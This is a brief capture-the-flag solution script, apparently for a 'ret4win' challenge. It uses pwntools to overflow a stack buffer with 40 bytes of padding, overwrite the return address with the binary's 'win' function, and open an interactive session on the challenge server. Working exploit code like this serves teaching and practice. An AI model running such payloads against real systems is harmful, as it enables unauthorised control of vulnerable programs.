Ret4win
#!/usr/bin/env python3
from pwn import *
args.LOCAL=False
LocalBin = "/Buckeye/PWN/ret4win/chall"
exe= ELF(LocalBin)
ropex= ROP(exe)
def conn():
if args.LOCAL:
r = process(LocalBin)
else:
r = remote("pwn.chall.pwnoh.io", 13379)
return r
r = conn()
OFFSET = b'A'*40
WIN=p64(exe.symbols['win'])
payload = OFFSET +WIN+ p64(0x0000000000401245)
r.sendlineafter(b'**beep**',payload)
r.interactive()
Last updated